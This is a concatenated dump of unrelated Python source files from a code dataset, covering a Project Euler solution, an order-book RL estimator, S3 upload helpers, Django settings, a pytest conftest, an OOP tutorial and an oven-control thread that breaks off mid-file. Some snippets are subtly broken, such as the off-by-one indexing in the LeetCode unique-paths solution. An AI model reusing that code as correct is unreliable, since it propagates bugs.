l.append(n)\n\n#     if n==89:\n#         succ = True\n\n#     for i in l:\n#         if i < lim:\n#             solution[i] = succ\n\n#     return succ\n\nans = 0\nfor i in range(1, 1000000):\n    if check(i):\n        ans += 1\n        # print(i)\n\nprint(ans)","sub_path":"PROJEULER/p92.py","file_name":"p92.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"647370947","text":"\nclass MobileNotification:\n    def __init__(self, index, action, app_package, category, posted_time_of_day):\n        self.index = index\n        self.action = action\n        self.appPackage = app_package\n        self.category = category\n        self.postedTimeOfDay = posted_time_of_day\n\n    def __str__(self):\n        rep = \"Notification {} (Action: {}, Package: {}, Category: {}, TimeOfDay: {})\"\\\n            .format(self.index, self.action, self.appPackage, self.category, self.postedTimeOfDay)\n        return rep\n","sub_path":"gym_notif/envs/mobile_notification.py","file_name":"mobile_notification.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339787457","text":"\"\"\"\nCopyright (c) 2021, Shashwat Saxena.\n\nThis module provides the helper functions and the class XAssetAgent, a reinforcement learning agent which will make\ntrading decisions based on LOBSTERReader data.\n\"\"\"\n\n######\n# Imports\n######\nfrom typing import List\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom lobpy.datareader.lobster import *\nfrom scipy.interpolate import interp1d\n\nimport time as t\n\n\nclass AgentState:\n    \"\"\"\n    State object for categorizing limit order book orders\n    ----------\n    params:\n        mid price of the book,\n        agent position (inventory),\n        agent cash,\n        time to end of day,\n        upper and lower quantity bounds\n\n    Example usage:\n    to create a state with agent cash and inventory\n    >>> agent = AgentState(1005.0, 1, 500, time_to_eod=3600.0, qty_high_bound=10, qty_low_bound=-10)\n    \"\"\"\n\n    def __init__(self,\n                 mid_price: float,\n                 agent_position: float,\n                 agent_cash: float,\n                 time_to_eod: float,\n                 qty_high_bound: float,\n                 qty_low_bound: float,\n                 sig_fig: float = 0.0001,\n                 lo_intensity_bid: float = 1,\n                 lo_intensity_ask: float = 1,\n                 bid_fill_prob: float = 100,  # Check whether we can evaluate pdf/cdf directly\n                 ask_fill_prob: float = 100,  # Check whether we can evaluate pdf/cdf directly\n                 max_running_penalty: float = 0.01,  # Check this to make sure it kinda makes sense\n                 liquidation_penalty: float = 100,  # Check this to make sure it kinda makes sense, but needs to be high\n                 accumulated_penalty: float = 0.0):\n        self.mid_price = mid_price  # measurable\n        self.agent_position = agent_position  # agent-driven\n        self.agent_cash = agent_cash  # agent-driven\n        # Use this in the actual value function, rather than the estimate\n        self.accumulated_penalty = accumulated_penalty  # agent-driven\n        self.qty_high_bound = qty_high_bound  # agent-driven\n        self.qty_low_bound = qty_low_bound  # agent-driven\n        self.sig_fig = sig_fig  # agent-driven\n        self.lo_intensity_bid = lo_intensity_bid  # secondary measure from LOB\n        self.lo_intensity_ask = lo_intensity_ask  # secondary measure from LOB\n        self.bid_fill_prob = bid_fill_prob  # agent-driven\n        self.ask_fill_prob = ask_fill_prob  # agent-driven\n        self.max_running_penalty = max_running_penalty\n        self.liquidation_penalty = liquidation_penalty\n        self.time_to_eod = time_to_eod\n\n    @property\n    def quantity_space(self):\n        return np.linspace(self.qty_low_bound, self.qty_high_bound, num=int(1 / self.sig_fig))\n\n    def est_log_penalized_value(self, is_bid_side=True) -> np.ndarray:\n        # w(t, q) = exp(A) * z\n        fill_prob = self.bid_fill_prob if is_bid_side else self.ask_fill_prob\n        qty = self.quantity_space\n        z = np.fromiter((np.exp(-self.max_running_penalty * fill_prob * quantity ** 2) for quantity in qty), np.float)\n        exp_a = np.zeros((len(qty), len(qty)))\n\n        for i in range(len(qty)):\n            for j in range(len(qty)):\n                exp_a[i, j] = np.exp(- self.max_running_penalty * fill_prob * qty[i] if i == j else\n                                     self.lo_intensity_bid / np.exp(1) if i + 1 == j else\n                                     self.lo_intensity_ask / np.exp(1) if i - 1 == j else\n                                     0)\n\n        return exp_a @ z\n\n    def est_running_penalty(self, bump: float = np.random.rand()) -> float:\n        eta, zeta = 0.5, 0.5\n\n        # h+/-(t, q) = w+/-(t, q) * exp(T - t) / k+/-\n        h_bid = self.est_log_penalized_value(is_bid_side=True) * np.exp(self.time_to_eod) / self.bid_fill_prob\n        h_ask = self.est_log_penalized_value(is_bid_side=False) * np.exp(self.time_to_eod) / self.ask_fill_prob\n\n        return (eta * h_bid + zeta * h_ask) * (1 + bump)\n\n    def est_value_fn(self) -> float:\n        eod_penalty = 0 if self.time_to_eod > 0 else self.liquidation_penalty * self.agent_position ** 2\n\n        running_penalty = interp1d(self.quantity_space, self.est_running_penalty(), kind='cubic')\n        return (self.agent_cash + self.agent_position * self.mid_price\n                - self.max_running_penalty * running_penalty(self.agent_position) - eod_penalty)\n\n\nclass PenaltyNetwork(nn.Module):\n\n    def __init__(self, input_size, output_size):\n        super(PenaltyNetwork, self).__init__()\n        self.layer_in = nn.Linear(input_size, 32)\n        self.layer_1 = nn.Linear(32, 32)\n        self.layer_out = nn.Linear(32, output_size)\n\n    def forward(self, x):\n        out_1 = F.relu(self.layer_in(x))\n        out_2 = F.relu(self.layer_1(out_1))\n        out_3 = self.layer_out(out_2)\n        return out_3\n\n\nclass ValueNetEstimator:\n\n    def __init__(self,\n                 readers: List[LOBSTERReader],\n                 qty_low_bound: int,\n                 qty_high_bound: int,\n                 max_cash: float,\n                 neural_net: nn.Module,\n                 loss_fn=nn.MSELoss,\n                 sig_fig: float = 0.001):\n        self.qty_low_bound = qty_low_bound\n        self.qty_high_bound = qty_high_bound\n        self.max_cash = max_cash\n        self.readers = readers\n        self.network = neural_net\n        self.loss_fn = loss_fn\n        self.sig_fig = sig_fig\n\n    @staticmethod\n    def _targets(training_input: np.ndarray) -> np.ndarray:\n        return np.fromiter((state.est_value_fn() for state in training_input), np.float)\n\n    @staticmethod\n    def _parse_states(readers: List[LOBSTERReader], qty_low_bound: int, qty_high_bound: int, max_cash: float) -> List[\n        AgentState]:\n        assert len(set([reader.ticker_str for reader in readers])) == 1\n\n        states = list()\n        for reader in readers:\n            # Get all mid prices\n            eod_time = reader.time_end - reader.time_start\n            dataset = reader.mid_prices_over_time(reader.num_levels, 0, eod_time)\n            qtys = np.linspace(qty_low_bound, qty_high_bound + 1, 1)\n            cash = np.linspace(0, max_cash, 1)\n            fill_prob = np.linspace(1, 100, 1)\n            max_running_penalty = np.linspace(1, 10, 1)\n\n            # Investigate use of Cython for this\n            for qty, cash, fill, max_penalty in zip(qtys, cash, fill_prob, max_running_penalty):\n                # We can train up the agent so that k+/- are the same. Exploration of RL agent can help with unequal\n                # scenarios, given the lack of an explicit model. 
We also need to estimate low and high intensity from\n # the environment.\n states += [AgentState(price, qty, cash, time, qty_high_bound, qty_low_bound, lo_intensity_ask=buy_mo,\n lo_intensity_bid=sell_mo, bid_fill_prob=fill, ask_fill_prob=fill,\n max_running_penalty=10 ** -max_penalty)\n for price, time, buy_mo, sell_mo in zip(dataset['Mid Prices'], dataset['Time'],\n dataset['Buy Intensity'], dataset['Sell Intensity'])]\n return states\n\n def train(self, steps: int):\n start_time = t.time()\n training_input = self._parse_states(self.readers, self.qty_low_bound, self.qty_high_bound, self.max_cash)\n print('Parsed Training Data in {} sec'.format(t.time() - start_time))\n targets = self._targets(training_input)\n print('Calculated Targets in {} sec'.format(t.time() - start_time))\n for step in range(steps):\n loop_time = t.time()\n output = [self.network(train_in) for train_in in training_input]\n loss = self.loss_fn(list(targets), output)\n loss.backward()\n for param in self.network.parameters():\n param.data.add_(- param.grad / steps)\n param.grad.data.zero_()\n print('Calibrated {}th step in {} sec'.format(step, t.time() - loop_time))","sub_path":"lobpy/datareader/ml_env.py","file_name":"ml_env.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"461943688","text":"import sys\nsys.path.append(\"./spikerlib.egg\")\nfrom spikerlib.metrics import modulus_metric as mm\nimport numpy as np\nimport multiprocessing as mp\n\n\ndef call_interval_mm(record):\n id = record[\"id\"]\n inspikes = record[\"inspikes\"]\n outspikes = record[\"outspikes\"]\n modulus = np.mean(mm.interval(inspikes, outspikes, 0, 5, mp=False))\n return {\"id\": id, \"modulus\": modulus}\n\nspikes = np.load(\"2014-01-31_spikes.npz\")[\"data\"]\n_num_items = len(spikes)\npool = mp.Pool()\nmodulus_iter = pool.imap(call_interval_mm, spikes)\nprint(\"Starting calculation of modulus ...\")\nmodulus = []\nfor idx, mod_item in enumerate(modulus_iter, 1):\n modulus.append(mod_item)\n print(\"%i/%i complete ...\" % (idx, _num_items))\nprint(\"Calculation complete. 
Saving to modulus.npz\")\nnp.savez(\"modulus.npz\", data=modulus)\nprint(\"DONE!\")\n\n","sub_path":"grid_modulus.py","file_name":"grid_modulus.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"574780127","text":"# https://leetcode.com/problems/unique-paths-ii/\n\nclass Solution(object):\n def uniquePathsWithObstacles(self, obstacleGrid):\n \"\"\"\n :type obstacleGrid: List[List[int]]\n :rtype: int\n\n dp(i,j) = dp(i-1,j) + dp(i, j-1) if grid[i][j] != 1\n else 0\n \"\"\"\n m = len(obstacleGrid)\n if m == 0:\n return 0\n n = len(obstacleGrid[0])\n dp = [0, 1] + [0] * (n-1)\n\n for i in range(0, m):\n for j in range(1, n+1):\n dp[j] = dp[j-1] + dp[j] if obstacleGrid[i][j] == 0 else 0\n\n return dp[n]\n\n","sub_path":"leetcode/python/unique-paths-ii.py","file_name":"unique-paths-ii.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"375631787","text":"import json\nimport os\n\nimport requests\nfrom werkzeug.utils import secure_filename\n\nfrom app.services.extensions import s3\nfrom config import Config\n\n\ndef upload_file_s3(image, aws_key, filename=0):\n try:\n filename_from_image = secure_filename(image.filename)\n os_filename, os_file_extension = os.path.splitext(filename_from_image)\n if filename == 0:\n filename = f\"{os_filename}{os_file_extension}\"\n else:\n filename = f\"{filename}{os_file_extension}\"\n except:\n if filename == 0:\n filename = secure_filename(image.filename)\n\n path = f\"{aws_key}/original/{filename}\"\n\n api_endpoint = 'https://api.kraken.io/v1/upload'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36'\n }\n files = {\n 'file': image\n }\n params = {\n \"auth\": {\n \"api_key\": Config.KRAKEN_API_KEY,\n \"api_secret\": Config.KRAKEN_API_SECRET\n },\n \"s3_store\": {\n \"key\": Config.AWS_ACCESS_KEY_ID,\n \"secret\": Config.AWS_SECRET_ACCESS_KEY,\n \"bucket\": Config.AWS_BUCKET,\n \"region\": Config.AWS_BUCKET_LOCATION\n },\n \"wait\": True,\n \"resize\": [\n {\n \"id\": \"original\",\n \"strategy\": \"none\",\n \"storage_path\": path.lower()\n },\n {\n \"id\": \"small\",\n \"strategy\": \"auto\",\n \"width\": 180,\n \"height\": 180,\n \"storage_path\": path.replace('original', 'small').lower()\n },\n {\n \"id\": \"medium\",\n \"strategy\": \"auto\",\n \"width\": 450,\n \"height\": 450,\n \"storage_path\": path.replace('original', 'medium').lower()\n },\n {\n \"id\": \"large\",\n \"strategy\": \"auto\",\n \"width\": 850,\n \"height\": 850,\n \"storage_path\": path.replace('original', 'large').lower()\n }\n ]\n }\n\n r = requests.post(url=api_endpoint, headers=headers, files=files, data={\n 'data': json.dumps(params)\n })\n\n r_json = r.json()\n success = r_json['success']\n\n if success:\n r_json['image_key'] = path.lower()\n return r_json\n\n\ndef delete_file_s3(key):\n client = s3\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key)\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key.replace('original', 'small'))\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key.replace('original', 'medium'))\n client.delete_object(Bucket=Config.AWS_BUCKET, Key=key.replace('original', 'large'))\n\n return True\n\n\ndef get_aws_image_keys(key):\n if key is not None:\n assert isinstance(key, str), \"\\\"key\\\" must be a string;.\"\n\n return {\n \"original\": 
f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key}\",\n \"small\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'small')}\",\n \"medium\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'medium')}\",\n \"large\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'large')}\"\n }\n else:\n return {\n \"original\": None,\n \"small\": None,\n \"medium\": None,\n \"large\": None\n }\n\n\ndef get_aws_image_keys_private(key):\n if key is not None:\n assert isinstance(key, str), \"\\\"key\\\" must be a string;.\"\n\n return {\n \"original\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key}\",\n \"small\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'small')}\",\n \"medium\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'medium')}\",\n \"large\": f\"https://{Config.AWS_BUCKET_CLOUDFRONT}/{key.replace('original', 'large')}\"\n }\n else:\n return {\n \"original\": None,\n \"small\": None,\n \"medium\": None,\n \"large\": None\n }\n","sub_path":"sensi-backend-init/app/services/aws/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455073239","text":"from .base import *\n\n\nsecrets = json.loads(open(os.path.join(SECRET_DIR, 'production.json')).read())\n\nDEBUG = False\n\n# Django-storages\nINSTALLED_APPS += [\n 'storages',\n]\n\nALLOWED_HOSTS = [\n 'localhost'\n]\n\nDEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'\nSTATICFILES_STORAGE = 'config.storages.S3StaticStorage'\n\nAWS_ACCESS_KEY_ID = secrets['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = secrets['AWS_SECRET_ACCESS_KEY']\nAWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']\nAWS_DEFAULT_ACL = secrets['AWS_DEFAULT_ACL']\nAWS_S3_REGION_NAME = secrets['AWS_S3_REGION_NAME']\nAWS_S3_SIGNATURE_VERSION = secrets['AWS_S3_SIGNATURE_VERSION']\n\n# Static\nSTATIC_ROOT = os.path.join(ROOT_DIR, '.static')\nMEDIA_ROOT = os.path.join(ROOT_DIR, '.media')\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\n# WSGI\nWSGI_APPLICATION = 'config.wsgi.production.application'\n\n# DB\nDATABASES = secrets['DATABASES']\n","sub_path":"app/config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206187580","text":"# Copyright 2018 The Imaging Source Europe GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom tcam_capture.PropertyWidget import PropertyWidget\n\nfrom PyQt5.QtCore import QSizeF, QPoint\n\n\nclass ROIGroup(object):\n \"\"\"\"\"\"\n def __init__(self):\n \"\"\"\"\"\"\n self.name = \"\"\n # list of members\n self.member_names = []\n # list of matching PropertyWidgets\n self.properties = []\n # color the border should have\n self.border_color = \"red\"\n\n def is_complete(self):\n \"\"\"\n Returns True if all members are available\n \"\"\"\n if len(self.member_names) != 
len(self.properties):\n return False\n\n # Check if we really have all properties\n for name in self.member_names:\n if not any(name == prop.prop.name for prop in self.properties):\n return False\n\n return True\n\n def add_member_maybe(self, prop: PropertyWidget):\n \"\"\"\n Check if property is an expected member and add it if so\n Returns True if property is a member\n \"\"\"\n if prop.prop.name in self.member_names:\n self.properties.append(prop)\n return True\n return False\n\n def set_position(self, x: int, y: int):\n\n for prop in self.properties:\n if \"Top\" in prop.prop.name:\n prop.set_property(int(y), False)\n elif \"Left\" in prop.prop.name:\n prop.set_property(int(x), False)\n\n def set_size(self, width: int, height: int):\n\n for prop in self.properties:\n if \"Width\" in prop.prop.name:\n prop.set_property(int(width), False)\n elif \"Height\" in prop.prop.name:\n prop.set_property(int(height), False)\n\n def get_position(self):\n\n x = 0\n y = 0\n\n for prop in self.properties:\n\n if \"Left\" in prop.prop.name:\n x = prop.prop.value\n elif \"Top\" in prop.prop.name:\n y = prop.prop.value\n\n return QPoint(x, y)\n\n def get_size(self):\n\n width = 0\n height = 0\n\n for prop in self.properties:\n\n if \"Width\" in prop.prop.name:\n width = prop.prop.value\n elif \"Height\" in prop.prop.name:\n height = prop.prop.value\n\n return QSizeF(width, height)\n\n def get_min_size(self):\n \"\"\"\n Return a QSizeF containing the minimum size this ROI must have\n \"\"\"\n width = 0\n height = 0\n\n for prop in self.properties:\n\n if \"Width\" in prop.prop.name:\n width = prop.prop.minval\n elif \"Height\" in prop.prop.name:\n height = prop.prop.minval\n\n return QSizeF(width, height)\n\n def get_max_size(self):\n \"\"\"\n Return the maximum possible size the ROI can have\n \"\"\"\n width = 0\n height = 0\n\n for prop in self.properties:\n\n if \"Width\" in prop.prop.name:\n width = prop.prop.maxval\n elif \"Height\" in prop.prop.name:\n height = prop.prop.maxval\n\n return QSizeF(width, height)\n\n @staticmethod\n def get_all_groups():\n \"\"\"\n Returns a list of all possible ROIGroups\n \"\"\"\n roi_list = []\n\n exp1 = ROIGroup()\n exp1.name = \"Exposure ROI\"\n exp1.member_names = [\"Exposure ROI Left\", \"Exposure ROI Top\",\n \"Exposure ROI Width\", \"Exposure ROI Height\"]\n roi_list.append(exp1)\n\n focus = ROIGroup()\n focus.name = \"Focus ROI\"\n focus.member_names = [\"Focus ROI Left\", \"Focus ROI Top\",\n \"Focus ROI Width\", \"Focus ROI Height\"]\n focus.border_color = \"blue\"\n roi_list.append(focus)\n\n # devices like the DFK33 UX250 have this\n auto_roi = ROIGroup()\n auto_roi.name = \"Auto Functions ROI\"\n auto_roi.member_names = [\"Auto Functions ROI Left\", \"Auto Functions ROI Top\",\n \"Auto Functions ROI Width\", \"Auto Functions ROI Height\",\n \"Auto Functions ROI Control\", \"Auto Functions ROI Preset\"]\n auto_roi.border_color = \"green\"\n roi_list.append(auto_roi)\n\n return roi_list\n","sub_path":"tools/tcam-capture/tcam_capture/ROIGroup.py","file_name":"ROIGroup.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"462996262","text":"import pytest\n\n\n@pytest.fixture()\ndef setUp():\n print(\"--Before test: \")\n yield\n print(\"--After test! 
\")\n\n\n@pytest.fixture(scope=\"class\")\ndef oneTimeSetUp(browser, request):\n print(\"--Running once time setUp\")\n if browser == 'firefox':\n value = 10\n print(\"Run test on Firefox\")\n else:\n value = 20\n print(\" Run test on Chrome\")\n if request.cls is not None:\n request.cls.value = value\n yield value\n print(\"--Running once time tearDown\")\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\", help=\"enter browser\")\n parser.addoption(\"--ostype\", help=\"type of operating system\")\n\n\n@pytest.fixture(scope=\"session\")\ndef browser(request):\n return request.config.getoption(\"--browser\")\n\n\n@pytest.fixture(scope=\"session\")\ndef ostype(request):\n return request.config.getoption(\"--ostype\")\n\n","sub_path":"pytestpackage/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"509242782","text":"\"\"\"\n1, 2, 3\n\"asdf\"\ntrue/false\n\"\"\"\n\neggs = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# read\nprint(eggs[3])\n# add\neggs.append(99)\n# update\neggs[4] = 55\n\nfor x in eggs:\n print(x*2)\n\n","sub_path":"other/sandbox/abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"584806063","text":"import argparse\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport json\nimport facenet\nimport compare\nimport sys\n\ndef np2embeddings(img_np, model):\n print('Calculating embedding')\n with tf.Graph().as_default():\n tfconfig = tf.ConfigProto()\n tfconfig.gpu_options.allow_growth = True\n sess = tf.Session(config=tfconfig)\n with sess.as_default():\n facenet.load_model(model)\n # Get input and output tensors\n images_placeholder = tf.get_default_graph().get_tensor_by_name(\"input:0\")\n embeddings = tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n phase_train_placeholder = tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n feed_dict = { images_placeholder: img_np, phase_train_placeholder:False }\n emb = sess.run(embeddings, feed_dict=feed_dict)\n return emb\n\n\ndef main(args):\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n batch_size = 1000\n img_names = os.listdir(args.input_dir)\n img_names.sort()\n n_img = len(img_names)\n img_names_this_batch = []\n for i, img_name in enumerate(img_names):\n img_names_this_batch.append(img_name)\n if i % batch_size == batch_size - 1 or i == n_img - 1:\n i_batch = int(i / batch_size)\n i_batch_str = str(i_batch).zfill(3)\n print(\"Processing batch {}\".format(i_batch))\n img_paths_this_batch = [os.path.join(args.input_dir, img_name_this_batch) \\\n for img_name_this_batch in img_names_this_batch ]\n # The corresponding image path is removed if face alignment fails.\n imgs_np = compare.load_and_align_data(img_paths_this_batch, 160, 32, 0.8)\n img_names_this_batch = [os.path.basename(img_path_this_batch) \\\n for img_path_this_batch in img_paths_this_batch ]\n emb = np2embeddings(imgs_np, args.model)\n img_names_output = os.path.join(output_dir, 'img_names_{}.txt'.format(i_batch_str))\n embeddings_output = os.path.join(output_dir, 'embeddings_{}'.format(i_batch_str))\n with open(img_names_output, 'w') as fout:\n path_names = {'path': args.input_dir, 'names': img_names_this_batch}\n fout.write(json.dumps(path_names, indent=4))\n np.save(embeddings_output, emb)\n img_names_this_batch = []\n 
print('Done')\n\ndef parse_arguments(argv):\n    parser = argparse.ArgumentParser()\n    parser.add_argument('model', type=str,\n        help='Could be either a directory containing the meta_file and ckpt_file or a model protobuf (.pb) file')\n    parser.add_argument('input_dir', type=str, help='Directory with raw images')\n    parser.add_argument('output_dir', type=str, help='Output numpy array for embeddings')\n    return parser.parse_args(argv)\n\nif __name__ == '__main__':\n    main(parse_arguments(sys.argv[1:]))","sub_path":"misc/align_and_embed_batch.py","file_name":"align_and_embed_batch.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"334644705","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nObject-oriented programming\n\n# Inheritance\n# Class attributes: once a class attribute is defined, it belongs to the class, but all instances of the class can access it\n# After defining a class and creating an instance of it, we can bind arbitrary attributes and methods to that instance\n# What if we want to restrict the attributes of an instance? E.g., only allow adding name and age attributes to Student instances.\n  To achieve this, Python lets you define a special __slots__ variable in the class definition to limit which attributes instances of that class may add.\n  Attributes defined in __slots__ only apply to instances of the current class; they have no effect on subclasses unless the subclass defines __slots__ too.\n# When binding attributes, exposing them directly is simple to write, but there is no way to validate parameters, so the score can be changed arbitrarily.\n  To restrict the range of score, we can set it through a set_score() method and read it through get_score(); that way\n  set_score() can validate the parameter. Python's built-in @property decorator is what turns a method into an attribute access.\n\"\"\"\n\nclass Human():\n    count = 0;  # class attribute: it belongs to the class, but all instances can access it\n    def __init__(self):\n        self.name = \"Human\";\n        Human.count = Human.count + 1;  # each new instance increments the class attribute count by 1\n        pass;\n\n    def run(self):\n        print(\"Human is running!\");\n\n    def eat(self):\n        print(\"Human is eating!\");\n\n\n# Man and Woman inherit from Human and override the run method\nclass Man(Human):\n    def run(self):\n        print(\"Man is running!\");\n\n\nclass Woman(Human):\n    def run(self):\n        print(\"Woman is running!\");\n\n\nclass Student():\n    # '_score' and 'setAge' must be declared here, or the assignments below raise AttributeError\n    __slots__ = ('name',\"age\",\"score\",\"_score\",\"setAge\");\n    def __init__(self):\n        self.score=0;\n\n    def get_score(self):\n        return self._score;\n\n    def set_score(self, value):\n        if not isinstance(value, int):\n            raise ValueError('score must be an integer!')\n        if value < 0 or value > 100:\n            raise ValueError('score must between 0 ~ 100!')\n        self._score = value\n\n    @property\n    def score2(self):\n        return self._score;\n\n    @score2.setter\n    def score2(self, value):\n        if not isinstance(value, int):\n            raise ValueError('score must be an integer!')\n        if value < 0 or value > 100:\n            raise ValueError('score must between 0 ~ 100!')\n        self._score = value\n\n    def __str__(self):\n        return \"score: %s\"% self._score;\n    __repr__ = __str__\n    pass;\n\ndef fn():\n    pass;\n\ndef set_age(self,age):\n    self.age = age;\n\nif __name__ == '__main__':\n    man = Man();\n    man.run();\n    man.eat();\n\n    # Getting information about objects\n\n    # type() gets the type\n    print(type(123));\n    print(type(\"ABC\"));\n    print(type(None));\n    print(type(man));\n    print(type(abs));\n\n    # For basic data types you can use int, str, etc. directly, but what if we need to check whether an object is a function? Use the constants defined in the types module\n    import types;\n    print(type(fn)==types.FunctionType)\n    print(type(abs) == types.BuiltinFunctionType)\n    print(type(lambda x :x) == types.LambdaType)\n\n    print(\"---isinstance---\");\n    # isinstance() checks the class type\n    woman = Woman();\n\n    print(isinstance(woman, Human));\n    print(isinstance(woman, Woman));\n    print(isinstance(woman, Man));\n\n    print(\"---dir---\");\n    # dir() lists all attributes and methods of an object\n    print(dir(Human));\n\n    # with getattr(), setattr() and hasattr() we can manipulate an object's state directly\n    print(hasattr(woman,\"name\"));  # does it have a 'name' attribute\n    print(hasattr(woman, \"y\"));  # does it have a 'y' attribute\n    print(getattr(woman, \"name\"));  # get the value of the name attribute\n    print(setattr(woman, \"name\",\"Woman\"));  # set the name attribute\n    print(woman.name);\n    print(getattr(woman, \"name\"));\n\n    # trying to fetch a non-existent attribute raises AttributeError\n    #print(getattr(woman,\"y\"));  # raises AttributeError\n\n    # you can pass a default argument; if the attribute does not exist, the default value is returned\n    print(getattr(woman,\"y\",404));\n\n    print(\"---class attribute test---\");\n    #\n    human = Human();\n    human2 = Human();\n    print(Human.count)  # 4\n\n    # bind a method/attribute to an instance\n    s = Student();\n    s.name = \"Stu1\";\n    print(s.name);\n    from types import MethodType;\n    s.setAge = MethodType(set_age,s);\n    s.setAge(25);\n    print(s.age);\n    # a method bound to one instance does not work on another instance\n    s2 = Student();\n    #s2.setAge(25); # AttributeError\n\n    # to bind a method to all instances, bind it to the class\n    Student.setAge = set_age;\n    s2.setAge(50);\n\n    print(\"---slots---\")\n    s3 = Student();\n    s3.name = \"S3\";  # ok\n    s3.age = 25;  # ok\n    # s3.sex = 50;  # AttributeError\n\n    print(\"---property---\")\n    s3.set_score(60);\n    print(s3.get_score());\n    s3.score2 = 80;\n    print(s3.score2);\n\n    print(\"---__str__---\")\n    print(s3.__repr__());","sub_path":"PycharmProjects/DataAnalysis/study/object_class.py","file_name":"object_class.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"22574490","text":"import sys\n\nsys.path.append('/home/pi/Desktop/py/')\nfrom time import sleep\nimport datetime\nimport TTC4006_Tira\nimport Impedanz_4192A_Eth\nfrom TempProfile import readTempProfile\nimport bme280\nimport time\nimport detect_file\nimport relay\nimport write_display\nimport os\nimport data_storage\nimport PID\n\nimport threading\nfrom threading import Thread\n\n# FILE_NAME = \"/media/pi/B49E-19751/Temperature_profile.txt\"\nfolder = \"/media/pi/\"\nTTC_SERIAL_PORT = \"/dev/ttyUSB1\"\nTTC_SERIAL_BAUD = 19200\nTTC_ADDRESS = 17\nIMP_IP = \"169.254.80.115\"\nIMP_PORT = 1234\nNX_SERIAL_PORT = \"/dev/ttyUSB0\"  # COM7\nI2C_address = 0x76\n\nDIS = write_display.Nextion(NX_SERIAL_PORT)\n\ncommand_sample = \"get n123.val\\xff\\xff\\xff\"\n\nAPP_OVEN_PRESENT = True\nAPP_IMP_PRESENT = True\nAPP_BME_280_PRESENT = True\nAPP_NEXTION_PRESENT = True\nAPP_PEN_DRIVE = True\n\n# HUMIDITY SENSOR PARAMETERS\nBME_280_INVALID_TEMP = -273\nBME_280_INVALID_HUMI = -273\n\n# RELAY PARAMETERS\nRELAY_HOLDING_TIME = 1.94\n\n\nclass OvenThread(Thread):\n    def __init__(self, TP, Father, RE_VAL):\n        Thread.__init__(self)\n        # import oven and multimeter\n        if APP_OVEN_PRESENT:\n            self.OVEN = TTC4006_Tira.TTC4006(TTC_SERIAL_PORT)\n            self.OVEN.TTC_ON()\n            self.OVEN.TTC_ENABLE_TEMP()\n\n        self.TP = TP\n        self.RE_VAL = RE_VAL\n\n        # set PID parameters\n        self.P = 5\n        self.I = 0\n        self.D = 0\n\n        self.pid = PID.PID(self.P, self.I, self.D)\n        self.pid.setSampleTime(1)\n\n        self.lock = threading.Lock()\n\n        self.Father = Father\n\n        self.t1 = 0\n        self.t2 = 0\n        self.t3 = 0\n\n    def getTimes(self):\n        return [self.t1,self.t2,self.t3]\n\n    def getStepNum(self):\n        return self.step_counter\n\n    def getStep(self):\n        return 